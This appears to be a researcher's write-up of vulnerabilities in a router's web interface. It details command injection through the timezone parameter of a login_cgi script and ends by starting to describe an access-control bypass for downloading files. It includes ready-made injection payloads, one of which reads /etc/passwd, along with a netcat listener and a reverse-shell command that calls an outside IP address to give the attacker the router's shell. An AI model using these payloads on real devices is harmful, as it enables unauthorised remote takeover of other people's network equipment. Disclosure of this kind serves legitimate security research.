The first time we start the device and login the web interface. Let's set the language and the timezone.
Using Fiddle tool to capture the HTTP request:
When we perform this action the login_cgi script takes the content of the timezone parameter and inserts it into the /tmp/TZ file:
Request Forgery
login_cgi
If we try to insert a value not present in the list of timezones, the script blocks us:
We can bypass this and write on TZ file what we want, using this payload:
|echo+TEST||a+#'+ ||a #
Replace the payload with:
|echo+TEST||a+#'+|echo `cat /etc/passwd` ||a #
So I can execute the command. On my remote machine, I am listening the port "12345" via nc -lvp 12345. Now, let's replace the payload with netcat.
nc 192.168.17.130:12345 -e /bin/ash
For now, I have got the router's shell on my remote machine.
download_file and storage_cgi
The device allows to share on the net the files present inside a storage usb devie and to download them. If we try to download /etc/passwd, the webserver responde with Access Denied, we can bypass it.
